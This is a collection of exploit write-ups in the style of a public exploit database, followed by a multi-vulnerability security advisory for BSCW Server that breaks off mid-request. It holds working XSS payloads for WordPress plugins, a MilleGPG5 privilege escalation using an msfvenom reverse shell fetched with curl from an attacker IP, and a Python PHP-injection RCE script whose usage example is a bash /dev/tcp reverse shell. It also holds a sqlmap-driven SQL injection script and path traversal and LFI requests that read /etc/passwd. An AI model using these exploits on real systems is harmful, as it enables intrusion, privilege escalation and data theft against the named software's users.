<pre><code># Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)<br /># Date: 3/16/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/<br /># Version: 1.13.21<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24300<br /><br />1. Description:<br />This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//<br /><br /></code></pre>
<pre><code># Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation<br /># Date: 2021-07-19<br /># Author: Alessandro 'mindsflee' Salzano<br /># Vendor Homepage: https://millegpg.it/<br /># Software Homepage: https://millegpg.it/<br /># Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe<br /># Version: 5.7.2<br /># Tested on: Microsoft Windows 10 Enterprise x64<br /><br />MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".<br /><br />Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.<br /><br />Affected version: MilleGPG5 5.7.2<br /><br /># Details<br /># By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.<br /># A low privilege account is able to rename the mysqld.exe file located in bin folder and replace<br /># with a malicious file that would connect back to an attacking computer giving system level privileges<br /># (nt authority\system) due to the service running as Local System.<br /># While a low privilege user is unable to restart the service through the application, a restart of the<br /># computer triggers the execution of the malicious file.<br /><br />(1) Impacted services.<br />Any low privileged user can elevate their privileges abusing these services:<br /><br />C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe<br />C:\Program Files\MilleGPG5\GPGService.exe<br /><br /><br /> Details:<br /><br /><br />SERVICE_NAME: MariaDB-GPG<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program<br />Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MariaDB-GPG<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />------<br /><br />SERVICE_NAME: GPGOrchestrator<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : GPG Orchestrator<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />(2) Folder permissions.<br />Insecure folders permissions issue:<br /><br /><br />C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)<br /> NT SERVICE\TrustedInstaller:(I)(F)<br /> NT<br />SERVICE\TrustedInstaller:(I)(CI)(IO)(F)<br /> NT AUTHORITY\SYSTEM:(I)(F)<br /> NT<br />AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)<br />BUILTIN\Administrators:(I)(F)<br />BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br />BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)<br /> CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br /> APPLICATION PACKAGE<br />AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE<br />AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /> APPLICATION PACKAGE<br />AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE<br />AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /> ...[SNIP]...<br />---------------<br /><br />C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)<br /> NT SERVICE\TrustedInstaller:(I)(F)<br /> NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)<br /> NT AUTHORITY\SYSTEM:(I)(F)<br /> NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Administrators:(I)(F)<br />BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)<br /> BUILTIN\Users:(I)(RX)<br /> BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)<br /> CREATOR OWNER:(I)(OI)(CI)(IO)(F)<br /> APPLICATION PACKAGE AUTHORITY\ALL<br />APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL<br />APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED<br />APPLICATION PACKAGES:(I)(RX)<br /> APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED<br />APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)<br /><br /><br /> # Proof of Concept<br /><br />1. Generate malicious .exe on attacking machine<br /> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe<br /><br />2. Setup listener and ensure apache is running on attacking machine<br /> nc -lvp 4242<br /> service apache2 start<br /><br />3. Download malicious .exe on victim machine<br /> type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"<br /><br />4. Overwrite file and copy malicious .exe.<br /> Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak<br /> Rename downloaded 'mysqld_evil.exe' file in mysqld.exe<br /><br />5. Restart victim machine<br /><br />6. Reverse Shell on attacking machine opens<br /> C:\Windows\system32>whoami<br /> whoami<br /> nt authority\system<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)<br /># Date: 3/16/2021<br /># Author: 0xB9<br /># Software Link: https://wordpress.org/plugins/post-grid/<br /># Version: 2.1.1<br /># Tested on: Windows 10<br /># CVE: CVE-2021-24488<br /><br />1. Description:<br />This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script><br />wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//<br /></code></pre>
<pre><code># Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)<br /># Date: November 30, 2021<br /># Exploit Author: Nicole Daniella Murillo Mejias<br /># Version: Advanced Comment System 1.0<br /># Tested on: Linux<br /><br />#!/usr/bin/env python3<br /><br /># DESCRIPTION:<br /># Commands are Base64 encoded and sent via POST requests to the vulnerable application, the<br /># response is filtered by the randomly generated alphanumeric string and only command output<br /># is displayed.<br />#<br /># USAGE:<br /># Execute the script and pass the command to execute as arguments, they can be quoted or unquoted<br /># If any special characters are used, they should be quoted with single quotes.<br />#<br /># Example:<br />#<br /># python3 acspoc.py uname -a<br /># python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'<br /><br />import sys<br />import base64<br />import requests<br />import random<br /><br />def generate_string(size):<br /> str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"<br /> return ''.join(random.choice(str) for i in range(size))<br /><br />def exploit(cmd):<br /><br /> # TODO: Change the URL to the target host<br /> url = 'http://127.0.0.1/advanced_comment_system/index.php'<br /><br /> headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br /><br /> encoded_cmd = base64.b64encode(cmd)<br /><br /> delimiter = generate_string(6).encode()<br /><br /> body = b'ACS_path=php://input%00&cbcmd='<br /> body += encoded_cmd<br /> body += b'&<?php echo " '<br /> body += delimiter<br /> body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'<br /><br /> try:<br /> result = requests.post(url=url, headers=headers, data=body)<br /> except KeyboardInterrupt:<br /> print("Keyboard interrupt detected.")<br /> sys.exit()<br /><br /> if f'{delimiter.decode()}: ' in result.text:<br /> position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")<br /><br /> if len(result.text[position:]) > 0:<br /> print(result.text[position:])<br /> else:<br /> print(f"No output from command '{cmd.decode()}'")<br /> print(f"Response size from target host: {len(result.text)} bytes")<br /><br />if __name__ == "__main__":<br /> exploit(' '.join(sys.argv[1:]).encode())<br /> <br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)<br /># Date 30.01.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/<br /># Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip<br /># Version: <= 2.0.2<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2015-9323<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md<br /><br />'''<br />Description:<br />The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.<br />'''<br /><br />banner = ''' <br /> <br /> .o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b. <br />d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D <br />8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY' <br />8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b. <br />Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D <br /> `Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P' <br /> <br /> [+] 404 to 301 - SQL-Injection <br /> [@] Developed by Ron Jost (Hacker5preme)<br /> <br />'''<br />print(banner)<br /><br />import argparse<br />import os<br />import requests<br />from datetime import datetime<br />import json<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br />my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /><br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># SQL-Injection (Exploit):<br /><br /># Generate payload for sqlmap<br />print ('[+] Payload for sqlmap exploitation:')<br />cookies_session = session.cookies.get_dict()<br />cookie = json.dumps(cookies_session)<br />cookie = cookie.replace('"}','')<br />cookie = cookie.replace('{"', '')<br />cookie = cookie.replace('"', '')<br />cookie = cookie.replace(" ", '')<br />cookie = cookie.replace(":", '=')<br />cookie = cookie.replace(',', '; ')<br /><br />exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'<br />exploit_risk = ' --level 2 --risk 2'<br />exploit_cookie = r' --cookie="' + cookie + r'" '<br /><br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'<br />os.system(exploit_code)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /></code></pre>
<pre><code># Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting<br /># Date: 2021-08-31<br /># Exploit Author: Tushar Jadhav<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html<br /># Version: 1.0<br /># Tested on: Windows 11<br /># Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/<br /># CVE: CVE-2021-40577<br /><br />=============================================================================================================================<br /><br />Stored Cross-site scripting(XSS):<br /><br />Stored attacks are those where the injected script is permanently stored on<br />the target servers,<br />such as in a database, in a message forum, visitor log, comment field, etc.<br />The victim then retrieves the malicious script from the server when it<br />requests the stored information.<br />Stored XSS is also sometimes referred to as Persistent XSS.<br /><br />==============================================================================================================================<br /><br />Attack vector:<br /><br />This vulnerability can result in the attacker can injecting the XSS payload<br />in the User Registration section. Each time the admin login or basic user<br />Login in the admin panel, the XSS triggers and attacker can able to steal<br />the cookie according to the crafted payload.<br /><br />===============================================================================================================================<br /><br />Vulnerable Parameters: Name<br /><br />===============================================================================================================================<br /><br />Steps for reproducing:<br /><br />1. Go to add users section<br />2. fill in the details. & put <script>alert(document.cookie)</script><br />payload in Name parameter.<br />3. Once we click on save, We can see the XSS has been triggered.<br /><br />================================================================================================================================<br /><br />Request :<br /><br />POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1<br />Host: 192.168.1.205:81<br />Content-Length: 133<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://192.168.1.205:81<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer:<br />http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3<br />Connection: close<br /><br />deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=<br /><br />===================================================================================================================================<br /> <br /></code></pre>
<pre><code># Exploit Title: CONTPAQi® AdminPAQ 14.0.0 - Unquoted Service Path<br /># Discovery by: Angel Canseco<br /># Discovery Date: 2022-01-16<br /># Software Link: https://www.contpaqi.com/descargas<br /># Tested Version: 14.0.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 pro x64 english<br /># Step to discover Unquoted Service Path:<br /><br /><br />C:\Users\test>wmic service get name, displayname, pathname, startmode |<br />findstr /i "Auto" | findstr /i "AppKeyLicenseServer_CONTPAQi"<br /><br />Servidor de Licencias CONTPAQir AppKeyLicenseServer_CONTPAQi<br />C:\Program Files (x86)\Compac\Servidor de<br />Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe Auto<br /><br />C:\Users\test>sc qc "AppKeyLicenseServer_CONTPAQi"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: AppKeyLicenseServer_CONTPAQi<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Compac\Servidor de<br />Licencias\AppkeyLicenseServer\AppKeyLicenseServer.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Servidor de Licencias CONTPAQi®<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would cause the local user to be able to insert their<br />code in the system root path undetected by the OS or other security<br />applications and elevate his privileges after reboot.<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211202-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities in BSCW Server<br /> product: OrbiTeam BSCW Server<br /> vulnerable version: BSCW Server 5.0.x, 5.1.x, <=5.2.4, <=7.3.x, <=7.4.3<br /> fixed version: 5.2.5, 7.4.4<br /> CVE number: requested/pending<br /> impact: Critical<br /> homepage: https://www.bscw.de/<br /> found: 2021-09-05<br /> by: Armin Stock (Atos ODS)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"BSCW Classic is in use around the world. With more than 500 functions, it<br />offers the right solution for every task. Turn your ideas into reality! Our<br />proven system has been supporting information flow and knowledge management at<br />numerous companies for more than 20 years."<br /><br />Source: OrbiTeam - BSCW Server: https://www.bscw.de/en/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version for the affected products which should<br />be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated path traversal allows access to local files<br /><br />The operation `addtempl` does allow a user to add files from a template<br />directory on the server. It accepts the parameter `template`, which is used to<br />create the path of the file. The only security mechanism to prevent a path<br />traversal attack is `template.replace("../", "")`. This can easily be bypassed,<br />by specifying a value like `....//`.<br /><br /><br />2) Authenticated wormable stored XSS<br /><br />The operation `chbanner` allows a user to change the banner of some objects.<br />The banner data does support different text formats.<br /><br />-------------------------------------------------------------------------------<br /># File: bscw/core/bs_txtformat.py<br />format_text = 1<br />format_textpre = 2<br />format_html = 4<br />format_bbcode = 8<br />format_wiki = 16<br />-------------------------------------------------------------------------------<br /><br />Using the format `textpre - 2` allows the user to include a limited set of HTML<br />tags in the banner.<br /><br />Validation of the provided data is as follows:<br />* Use the `Python` module `HTMLParser.HTMLParser` to parse the provided data<br />* Override `handle_starttag`<br />* check if tag is in `ValidElements`<br />* check if an attribute does not start with `on`<br />* check that the value of the `href` attribute does not start with `javascript:`<br /><br />One way to exploit this behavior and perform an XSS attack is to reuse<br />the Dojo Toolkit (https://dojotoolkit.org) and the available types.<br /><br /><br />3) Multiple HTTP header attacks<br /><br />The operation `login` does accept the query parameter `returnto`. The value of<br />this parameter is later used as a value in the HTTP response header `Location`.<br />As the value is not validated or encoded it is possible to perform several<br />attacks:<br /><br />* Open redirect<br />* HTTP header injection<br /><br /><br />4) Session object manipulation allows to bypass entering the password for<br />admin actions<br /><br />The BSCW server has a check to validate that a user is an actual admin, which<br />can be summarized as:<br /><br />Summary of admin check:<br />* Is the username in the configured `SERVER_ADMINS` array<br />* Is the remote IP in the configured allow-list<br />* Has the session object a key `is_admin`<br /><br />To fulfill the third requirement, the normal way is calling the operation<br />`admin` and enter the user password.<br /><br />An attacker with access to an admin session (maybe via XSS) can bypass this<br />step by using any operation based on the `bscw.core.cl_input.InputBase` class.<br />This class verifies `POST` requests and the incoming data. If there is something<br />wrong, it will save the provided data in the `session` object and redirect the<br />user to the current page. The key, which is used to store the provided data in<br />the `session` object, is the value of the parameter `session`. This allows an<br />attacker to set a non-empty value for the `is_admin` key and fulfill the third<br />requirement of the `is_admin` function.<br /><br /><br />5) Unauthenticated LFI<br /><br />The operation `theme` is vulnerable to a local file inclusion attack. It<br />accepts the query parameter `style_name`, which is used to locate a file and<br />serve the content. As the parameter is not validated and no restriction is<br />enforced to serve only files from specific directories it is possible to read<br />arbitrary files.<br /><br />But there is a restriction, which files can be accesses as the content of the<br />file is used as a format string with the `%` operation.<br /><br /><br />6) Unauthenticated reflected XSS - refresh<br /><br />The operation `refresh` allows setting arbitrary attributes on the `response`<br />object. The `response` object is later used to create the actual HTTP response.<br /><br />Important `response` object attributes:<br />* `_type` - e.g. `location` used for redirection, `body` set HTTP body to<br />`body` attribute, `file` serve local file<br />* `body` - content send as HTTP body, if `_type` == `body`<br />* `mimetype` - used for the value of the HTTP header `Content-Type`, can also<br />be used for HTTP header injection<br /><br /><br />7) Unauthenticated reflected XSS - upload_browser<br /><br />The operation `upload_browser` accepts the query parameter `CKEditorFuncNum`,<br />which is reflected in the response. As the value is used inside an existing<br />`script` block it is possible to inject own `JavaScript` code.<br /><br /><br />8) Unauthenticated user enumeration<br /><br />It is possible to enumerate all usernames registered on the BSCW server. This<br />information can later be used for password-based attacks.<br /><br />If the verification of the session token fails, a error message is shown to the<br />user that he needs to re-authenticate. This message does contain the username<br />if the provided `USERID` is valid.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated path traversal allows access to local files<br /><br />This allows an attacker to add any file from the server's filesystem to its own<br />folder and download the content afterwards.<br /><br />-------------------------------------------------------------------------------<br />POST /sec/bscw.cgi/209?op=_addtempl HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: curl/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 174<br />Origin: http://bscw.local:8080<br />DNT: 1<br />Connection: keep-alive<br />Referer: http://bscw.local:8080/sec/bscw.cgi/209?op=addtempl<br />Cookie: MicroblogInboxIndicatorState=%5B0%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; _sec_bscws="3237cc7f0956a03651500ee5e3254a01:51"; <br />bscw_auth="XPN8djYx/kdqb4t8KopuYS+KkgMzTthB:33"<br />Upgrade-Insecure-Requests: 1<br /><br />op=addtempl&bscw_v_post=JoyUiupaaP5QtTJUse%2BD3Vp2IVtkwoTthB&template=....//....//....//....//....//....//....//....//....//....//etc/passwd&name=hello_pwd&description=&_ok_a=+++OK+++<br />-------------------------------------------------------------------------------<br /><br />-------------------------------------------------------------------------------<br />GET /sec/bscw.cgi/d2748/hello_pwd HTTP/1.1<br />....<br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 08 Sep 2021 11:44:10 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Expires: Wed, 08 Sep 2021 09:44:10 GMT<br />Last-Modified: Wed, 08 Sep 2021 11:43:52 GMT<br />Etag: "2750.1631101432.958828"<br />Content-Length: 1049<br />Content-Type: application/octet-stream<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />_apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br />openldap:x:101:102:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br />bscw:x:999:999:BSCW system user:/opt/bscw:/bin/bash<br />-------------------------------------------------------------------------------<br /><br /><br />2) Authenticated wormable stored XSS<br /><br />The following banner code:<br />-------------------------------------------------------------------------------<br /><P>hello <div data-dojo-type="dojobscw.operations.HoverToolbarButton"<br />data-dojo-props="onClick: alert(document.domain)">foo</div><br />-------------------------------------------------------------------------------<br />uses only valid tags an attributes. As it contains `Dojo` specific attributes<br />it is processed by `Dojo`, which results in executing the provided `JavaScript`<br />code. Although the attribute name of the payload is `onClick`, it is triggered<br />just by visiting the site.<br /><br />As it is possible to change the banner of shared objects like folders, a<br />malicious user can weaponize a banner, which is shared with other people and<br />include a self spreading payload. After other users with access to the folder<br />visit it, the payload gets triggered and can copy itself into all other shared<br />folders the victim has access to.<br /><br /><br />3) Multiple HTTP header attacks<br /><br />3.1) Open redirect<br />The URL used in the `Location` header can point to any URL, which forces the<br />user's browser to navigate to an attacker controlled site.<br /><br />-------------------------------------------------------------------------------<br />GET /pub/bscw.cgi/306?op=login&returnto=https://www.example.com HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Cookie: _pub_bscws="88522409e1509f61abbbf230eed829ad:2"<br />Upgrade-Insecure-Requests: 1<br />Pragma: no-cache<br />Cache-Control: no-cache<br /><br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 303 See Other<br />Date: Thu, 02 Sep 2021 20:24:28 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Thu, 02 Sep 2021 18:24:28 GMT<br />Location: https://www.example.com<br />Content-Type: text/html; charset=UTF-8<br />-------------------------------------------------------------------------------<br /><br />3.2) Header injection<br />As there is no validation at all, it is also possible to inject `\r\n` which<br />allows an attacker to "create" new HTTP headers in the response. This can for<br />example be abused to set new cookies.<br /><br />-------------------------------------------------------------------------------<br />GET /pub/bscw.cgi/306?op=login&returnto=/%0d%0aSet-Cookie:%20Foo=bar<br />...<br />-------------------------------------------------------------------------------<br /><br />Response:<br />-------------------------------------------------------------------------------<br />HTTP/1.1 303 See Other<br />Date: Thu, 02 Sep 2021 20:29:17 GMT<br />Server: SimpleHTTP/0.6 Python/2.7.18<br />Cache-Control: no-cache<br />Pragma: no-cache<br />Expires: Thu, 02 Sep 2021 18:29:17 GMT<br />Location: http://bscw.local:8080/<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 2425<br />Set-Cookie: _pub_bscws="6a0d3c1b6810d47d4f57662f9993fceb:2"; expires=Tue, 23 Feb 2027 20:29:17 GMT; httponly; Path=/pub/; Version=1<br />Set-Cookie: Foo=bar<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />-------------------------------------------------------------------------------<br /><br /><br />4) Session object manipulation allows to bypass entering the password for<br />admin actions<br /><br />After logging in with an admin account the `Admin` menu is disabled.<br /><br />Set the `is_admin` attribute in the user session:<br /><br />-------------------------------------------------------------------------------<br />POST /sec/bscw.cgi/30 HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: curl/1.1<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: keep-alive<br />Referer: http://bscw.local:8080/pub/bscw.cgi/30<br />Cookie: MicroblogSlidingPanelDisplayState=%22hidden%22; MicroblogInboxIndicatorState=%5B0%2C0%5D; bscw_auth="8Uf4+dFG/DGjTdFBFFFVZORIEMH1TthB:33"; <br />_sec_bscws="fa275d74b9ddb381ea238fb9e62578dd:51"<br />Upgrade-Insecure-Requests: 1<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 60<br /><br />op=copylink&id=30&noflash=1&session=is_admin&_ok_.x=+++OK+++<br />-------------------------------------------------------------------------------<br /><br />After issuing the above request the `Admin` menu is enabled, without entering<br />the user password.<br /><br /><br />5) Unauthenticated LFI<br /><br />Getting the `/etc/passwd` file via the public interface:<br /><br />-------------------------------------------------------------------------------<br />GET /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd HTTP/1.1<br />Host: bscw.local:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 